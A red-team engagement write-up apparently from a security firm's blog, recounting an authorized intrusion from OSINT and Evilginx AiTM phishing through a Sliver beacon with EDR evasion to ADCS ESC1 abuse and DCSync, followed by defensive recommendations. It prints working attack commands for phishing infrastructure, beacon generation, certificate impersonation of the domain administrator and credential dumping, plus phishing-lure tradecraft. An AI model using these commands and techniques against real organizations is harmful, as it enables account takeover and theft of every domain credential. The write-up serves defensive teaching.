The client’s CISO told us on the kickoff call: “We’ve invested heavily in our security stack. CrowdStrike, MFA everywhere, a mature SOC. I honestly don’t think you’ll get far.”

Seventy-two hours later, we had Domain Admin. We’d been in their environment for 36 hours before the SOC noticed anything — and what they did notice, they wrote off as a false positive.

This is that story.

TL;DR

  • Full domain compromise achieved in 72 hours against a hardened target running CrowdStrike Falcon + MFA + active SOC monitoring
  • Initial access via AiTM phishing — stole session tokens, bypassed MFA entirely
  • EDR evasion through Sliver C2 with sleep obfuscation + indirect syscalls, running inside a signed Microsoft process
  • Attack path: AiTM foothold → BloodHound recon → ADCS ESC1 → Domain Admin
  • What would have stopped us: phishing-resistant MFA (FIDO2), ADCS auditing, and network segmentation

The Rules of Engagement

Before anything else: this engagement was fully authorized. The client signed a detailed rules of engagement document covering scope, timing windows, and emergency contacts. Everything described here was performed with explicit written permission against their own infrastructure.

The objective was straightforward: demonstrate whether an external attacker could achieve Domain Admin access, and document exactly how. No in-person social engineering, no physical access — purely remote. The engagement window was five days, Monday through Friday.

Scope included all assets resolving to their primary domain and two subsidiaries. We had one starting artifact: the company’s primary domain name.


Day 0: Knowing Before Doing

Hours 0–12 | Passive OSINT

We didn’t touch their network on day zero. Everything we did was passive — queries to public services, no packets sent to client infrastructure.

Certificate transparency logs were the first stop. Using crt.sh and certspotter, we pulled every TLS certificate ever issued for the domain and its wildcards:

# Pull all subdomains from cert transparency (%25 is the URL-encoded "%" wildcard)
curl -s "https://crt.sh/?q=%25.targetcorp.com&output=json" | \
  jq -r '.[].name_value' | sort -u | tee subdomains.txt

This gave us 340 subdomains. Most were internal-facing or dead — but twelve were live externally, including a VPN gateway, a helpdesk portal, and an Outlook Web Access instance that the IT team had apparently forgotten about.

LinkedIn was next. We built a staffing map: IT department (17 people), security team (4 people), executive assistants (who have access to everything). Job postings revealed their exact tech stack — the company was actively hiring for “Okta SSO administrator” and “CrowdStrike Falcon engineer.” This told us exactly what security tooling they ran before we sent a single packet.

GitHub dorking turned up three repositories from employees with the company domain in their git config. One contained a configuration file committed eight months ago with what appeared to be an internal API endpoint and a service account username. The credentials had been rotated, but the username pattern (svc-[function]-[department]) was gold for later.
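
The dorking itself takes minutes to reproduce. Queries of this shape (illustrative, not our exact set) surface most of what we found; here shown via the gh CLI’s code search:

# Hypothetical gh CLI equivalents of the web-UI dorks we ran
gh search code '"targetcorp.com" password' --limit 50
gh search code '"@targetcorp.com"' --filename .env
gh search code '"svc-" "targetcorp.com"' --limit 50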

Email harvesting with theHarvester and Hunter.io gave us 89 valid email addresses in the format firstname.lastname@targetcorp.com. We now had a target list for phishing.
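
For replication, theHarvester is a one-liner (the Hunter.io source needs its API key set in theHarvester’s config first; source list varies by engagement):

# Passive email harvesting; -b picks data sources, -f writes the report files
theHarvester -d targetcorp.com -b bing,duckduckgo,crtsh -f targetcorp_emails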

By hour 12, we’d mapped their external attack surface without touching a single company-owned system.


Day 1: Getting In

Hours 12–28 | AiTM Phishing Infrastructure + Initial Access

Modern organizations have MFA. Legacy phishing — send a link, harvest credentials — gets you a username and password that’s useless without the second factor. The solution is Adversary-in-the-Middle phishing: you proxy the real login page, steal the session after MFA completes.

We used Evilginx3 with a custom phishlet for their Outlook Web Access portal. The setup looks like this:

[Attacker infrastructure]
Evilginx proxy (VPS, bulletproof hosting)
↓ (real-time proxying)
[Victim's browser] → fake login page → real OWA login
Session cookie captured mid-transit

The victim authenticates normally — they see the real login page, complete MFA as expected. What they don’t see is that every HTTP request and response passes through our proxy, and we capture the session cookie the moment their browser receives it.
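
Operator-side, the setup is a handful of Evilginx console commands. A minimal sketch, assuming a custom phishlet named owa and DNS for the phishing domain already pointed at the VPS (Evilginx provisions its own Let’s Encrypt certificates; exact config syntax varies slightly between versions):

# Inside the evilginx console
config domain targetcorp-it.com
config ipv4 <vps_ip>
phishlets hostname owa targetcorp-it.com
phishlets enable owa
lures create owa
lures get-url 0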

For infrastructure, we used a domain registered 45 days in advance (new domains trigger reputation filters), hosted on a VPS through a residential proxy to avoid datacenter IP reputation blocks. The phishing domain was a convincing typosquat: targetcorp-it.com with a valid TLS certificate.

The lure email claimed their VPN certificate was expiring and they needed to re-authenticate through IT’s portal. We targeted 12 people: IT staff and three executive assistants. We sent at 8:47 AM on Tuesday — before the SOC’s morning briefing, when inboxes are busiest.

For a deep dive on the technical setup, see our AiTM phishing guide.

Four people clicked. Two authenticated fully. By 9:23 AM Tuesday, we had two valid OWA session cookies.

We imported them into Firefox using Cookie Editor and logged in without entering credentials. We were in.


The Clock Starts: First 60 Minutes on the Inside

Session cookies expire. We had a valid email session but needed persistence in the environment — a shell on a workstation, not just a browser session.

From OWA, we could read emails. We looked for anything with attachment previews enabled — a common misconfiguration. We found an HR mass-email to all staff with a link to “update your remote work equipment request form.” We crafted a reply-all from the compromised mailbox, spoofing the original format, with a link to our phishing page instead.

This is called internal phishing — and it’s devastatingly effective because the email comes from a legitimate internal account, bypasses all external email filtering, and employees trust internal communications.

Within 45 minutes, we had our first shell.


Day 1–2: Living Inside Without Being Seen

Hours 28–48 | EDR Evasion + Internal Reconnaissance

The victim’s machine had CrowdStrike Falcon with prevention mode enabled. We knew this from the LinkedIn job postings.

Our payload was a Sliver C2 beacon with several evasion layers applied:

Sleep obfuscation — when the beacon isn’t active, it encrypts its own memory regions, so they read as high-entropy noise rather than recognizable code. EDR tools that scan process memory between callback intervals find nothing to signature.

Indirect syscalls — instead of calling Windows API functions through their hooked userland entry points, the beacon resolves syscall numbers at runtime and enters the kernel through ntdll’s own syscall instructions, sidestepping the EDR’s userland hooks entirely.

Injection into a signed process — the beacon injected itself into OneDrive.exe, a Microsoft-signed process that CrowdStrike Falcon treats with elevated trust. Our malicious code ran inside Microsoft’s process space.
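
For reference, the base payload came out of Sliver’s generate command, roughly like this; the sleep-obfuscation and syscall layers were applied by separate loader tooling around it, and the C2 domain is a placeholder:

# Sliver server console: HTTP(S) beacon with jittered callbacks
# --evasion turns on Sliver's built-in evasion; the memory encryption and indirect
# syscalls described above came from our loader, not from stock Sliver flags
generate beacon --http <c2_domain> --seconds 60 --jitter 30 --format shellcode --evasion --save /tmp/beacon.bin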

The beacon checked in over HTTPS to a C2 server we’d configured to look like Microsoft Graph API traffic. Port 443, valid TLS certificate, traffic blending in with legitimate cloud service communications. For our C2 infrastructure approach, see C2 Without Owning C2.

CrowdStrike didn’t alert. We had a stable shell.

Internal reconnaissance began immediately.

We ran whoami /all to understand our user’s privileges — a standard domain user, no local admin. We checked for local admin via net localgroup administrators and confirmed the user wasn’t in it. We needed to escalate.
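
In command form:

# First-minutes triage from the beacon
whoami /all                      # user, groups, token privileges
net localgroup administrators    # local admin membership (our user was absent)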

Before touching any exploit, we mapped the environment:

# Enumerate domain computers with native ADSI (still LDAP under the hood,
# but low-volume and tool-free, so the queries blend with normal workstation traffic)
$searcher = [adsisearcher]"(objectClass=computer)"
$searcher.FindAll() | Select-Object -ExpandProperty Path | Out-File computers.txt

Then we deployed SharpHound (BloodHound’s data collector) through our C2 session. SharpHound queries Active Directory for users, groups, GPOs, sessions, and ACLs — then BloodHound CE visualizes the attack paths.

We ran it with minimal flags to reduce noise:

# Low-noise collection — avoid full session enumeration which generates excess 4624 events
.\SharpHound.exe -c DCOnly,ObjectProps,ACL,Trusts --outputdirectory C:\Windows\Temp\

We exfiltrated the ZIP over our C2 channel and loaded it into BloodHound CE.

The attack graph was immediately interesting. The user account we’d compromised (j.henderson, an executive assistant) had GenericWrite over a distribution group. That group had a nested membership in an IT support group. And that IT support group had AddSelf permissions on a security group called PKI-Admins.

PKI-Admins had ManageCA on the Certificate Authority.

We’d found our path — and it ran directly through ADCS.
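
We never actually had to walk that group chain, because the ESC1 template below was enrollable by any authenticated user. Had we needed it, the abuse is two PowerView calls (group names here are placeholders for the client’s real ones):

# Hypothetical chain walk with PowerView
Add-DomainGroupMember -Identity 'Dist-Group' -Members 'j.henderson'    # GenericWrite on the distribution group
Add-DomainGroupMember -Identity 'PKI-Admins' -Members 'j.henderson'    # AddSelf, inherited through nesting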

For BloodHound methodology details, see our BloodHound practical guide.


Day 2–3: The Kill Shot

Hours 48–68 | ADCS ESC1 → Domain Admin

Active Directory Certificate Services (ADCS) is one of the most consistently underestimated attack surfaces in enterprise environments. When misconfigured, it lets any authenticated user request a certificate for any account in the domain — including Domain Admin.

This misconfiguration is called ESC1. The conditions are:

  1. A certificate template allows the requester to specify a Subject Alternative Name (SAN)
  2. The template grants enrollment rights to a broad group (Domain Users, Authenticated Users)
  3. Manager approval is not required

We used Certipy to enumerate:

certipy find -u j.henderson@targetcorp.com -hashes :<ntlm_hash> \
-dc-ip 10.10.1.1 -vulnerable -stdout

Two vulnerable templates came back. The most exploitable was UserAuthTemplate — enrollment open to Authenticated Users, SAN allowed, no manager approval, EKU included Client Authentication.

We requested a certificate impersonating the Domain Admin account:

certipy req -u j.henderson@targetcorp.com -hashes :<ntlm_hash> \
-ca targetcorp-CA -template UserAuthTemplate \
-upn administrator@targetcorp.com \
-dc-ip 10.10.1.1

The CA issued it without complaint. We now held a certificate that the domain believed belonged to the Administrator account.

We used that certificate to authenticate and retrieve the Administrator’s NTLM hash via PKINIT:

certipy auth -pfx administrator.pfx -domain targetcorp.com -dc-ip 10.10.1.1

With the NTLM hash, we ran DCSync — pulling every password hash from the domain controller without ever logging in to it:

secretsdump.py -hashes :<administrator_hash> -just-dc \
administrator@dc01.targetcorp.com

We had every domain credential. Domain Admin achieved. Seventy hours after the kickoff call.

For the full ADCS attack breakdown, see ADCS Abuse with Certipy: ESC1 to ESC8.


The Debrief: What the SOC Saw (and Missed)

The client’s SOC generated exactly two alerts during our entire engagement.

Alert 1 — Tuesday 11:42 AM: “Unusual login from new geographic location.” This fired when we imported the session cookie. The analyst reviewed it, saw that the user had just authenticated successfully through OWA with MFA, and marked it as a false positive. The geographic anomaly was real — but the MFA success made it appear legitimate. This is the core problem with AiTM: from the defender’s perspective, authentication looks normal.

Alert 2 — Wednesday 3:18 PM: SharpHound’s LDAP queries generated a “High volume LDAP queries from workstation” alert. The analyst opened the ticket and left it in queue. By the time it was reviewed, we’d already completed the ADCS attack. The 22-hour response time on an active reconnaissance alert is a gap most organizations share.

What generated zero alerts:

  • AiTM phishing campaign (no endpoint telemetry for browser-based attacks)
  • Internal phishing from the compromised mailbox
  • Sliver beacon running inside OneDrive.exe for 36 hours
  • Certificate request for administrator@targetcorp.com
  • DCSync operation

What Would Have Stopped Us

This is the section security teams actually care about. Here’s the honest list, in order of impact:

1. Phishing-Resistant MFA (FIDO2/Passkeys)

Nothing else we did would have been possible if they’d used hardware security keys or FIDO2 passkeys for authentication. These are cryptographically bound to the legitimate domain — our proxy cannot intercept them. AiTM phishing is defeated entirely. Cost: ~$25–50 per user for hardware keys, or free with Windows Hello for Business.

See our Passkeys and FIDO2 guide for deployment details.

2. ADCS Auditing and Template Hardening

The ESC1 vulnerability had existed in their environment for over three years — since the CA was deployed. Running certipy find or Purple Knight against their own ADCS would have flagged it immediately. This is a one-time audit that takes under an hour and eliminates an entire class of domain compromise paths.
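
For ESC1 specifically, the fix is removing the requester-controlled SAN. A sketch with the RSAT ActiveDirectory module, assuming the template is UserAuthTemplate as in our engagement (the supported route is the Certificate Templates console; test any direct edit in a lab first):

# Clear CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT (0x1) so requesters can't choose their own SAN
$base = "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=targetcorp,DC=com"
$tpl  = Get-ADObject -SearchBase $base -Filter { cn -eq "UserAuthTemplate" } -Properties msPKI-Certificate-Name-Flag
Set-ADObject -Identity $tpl -Replace @{ 'msPKI-Certificate-Name-Flag' = ($tpl.'msPKI-Certificate-Name-Flag' -band (-bnot 1)) }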

3. Conditional Access with Compliant Device Requirements

If their conditional access policy required a Compliant Device (Intune-enrolled, MDM-managed) rather than just “MFA completed,” importing a stolen cookie from our attacker machine would have been blocked. The session would authenticate but fail the device compliance check.
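
In Entra ID that is a single grant control. A sketch via the Microsoft Graph PowerShell SDK, using the public conditionalAccessPolicy schema (start in report-only mode and scope carefully before enforcing):

# Require a compliant device for all apps, report-only to start
Connect-MgGraph -Scopes "Policy.ReadWrite.ConditionalAccess"
New-MgIdentityConditionalAccessPolicy -BodyParameter @{
    displayName   = "Require compliant device"
    state         = "enabledForReportingButNotEnforced"
    conditions    = @{
        users        = @{ includeUsers = @("All") }
        applications = @{ includeApplications = @("All") }
    }
    grantControls = @{
        operator        = "OR"
        builtInControls = @("compliantDevice")
    }
}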

4. LDAP Query Monitoring with Faster Response

The SharpHound alert was accurate. Twenty-two hours to review an active reconnaissance alert gave us the time we needed. Automated response (quarantine the source machine, require re-authentication) would have disrupted our timeline significantly.

5. Email Sending Policy Restrictions

The internal phishing worked because any domain user could send email to all staff. A simple policy — restrict mass email sends to IT and HR distribution lists — would have blocked the internal pivot.
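
In Exchange Online that is delivery management on the list itself. A sketch with placeholder identities:

# Only named senders may mail the all-staff distribution list
Set-DistributionGroup -Identity "All Staff" -AcceptMessagesOnlyFromSendersOrMembers "IT-Comms","HR-Comms"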


The Patterns We See Repeatedly

This engagement wasn’t unusual. The same patterns appear across the majority of red team engagements we run:

The initial access is almost always phishing. Not because other techniques don’t work — VPN vulnerabilities, exposed services, and supply chain attacks all appear regularly — but because phishing reliably bypasses network perimeter controls. The human is the consistent entry point.

EDR is not a last line of defense. CrowdStrike, SentinelOne, and Defender for Endpoint are all excellent tools. They also all have known bypass techniques that are documented publicly. EDR slows attackers down; it doesn’t stop a determined one. Layer it with network detection, behavioral analytics, and identity monitoring.

ADCS is misconfigured everywhere. ESC1, ESC4, ESC6, ESC8 — we find exploitable ADCS configurations in roughly 60% of engagements against organizations running their own PKI. It is the most overlooked high-impact attack surface in Windows environments today.

Response time is the real variable. In this engagement, the difference between success and detection was a 22-hour queue time on a legitimate alert. Detection is only half the equation. The other half is what you do with what you see, and how fast you do it.


What You Can Do This Week

You don’t need to hire a red team to find these gaps. Start here:

Monday: Audit your ADCS templates. Download Certipy and run certipy find -vulnerable -stdout with any domain user’s credentials. If vulnerable templates come back, fix them before anything else.

Tuesday: Review your conditional access policies. Is “MFA completed” the only condition for accessing email and VPN? Add device compliance requirements if your MDM deployment allows it.

Wednesday: Check your SOC queue. How old is the oldest unreviewed alert? Set SLA targets for anything tagged as active reconnaissance or unusual authentication.

Thursday: Run a phishing simulation using an AiTM-capable framework. If your users fall for it — and they will — it’s a training and MFA architecture problem, not a user problem.

Friday: Pull your ADCS audit logs. Event IDs 4886 (certificate request received), 4887 (certificate issued), and 4888 (certificate request denied) should be monitored. If you’ve never looked at them, now is the time.
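
A starting point, assuming the CA’s Security log is reachable remotely (hostname is a placeholder):

# Recent certificate activity from the CA
Get-WinEvent -ComputerName ca01 -FilterHashtable @{ LogName = 'Security'; Id = 4886, 4887, 4888 } -MaxEvents 100 |
    Format-Table TimeCreated, Id, @{ n = 'Event'; e = { ($_.Message -split "`n")[0] } }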


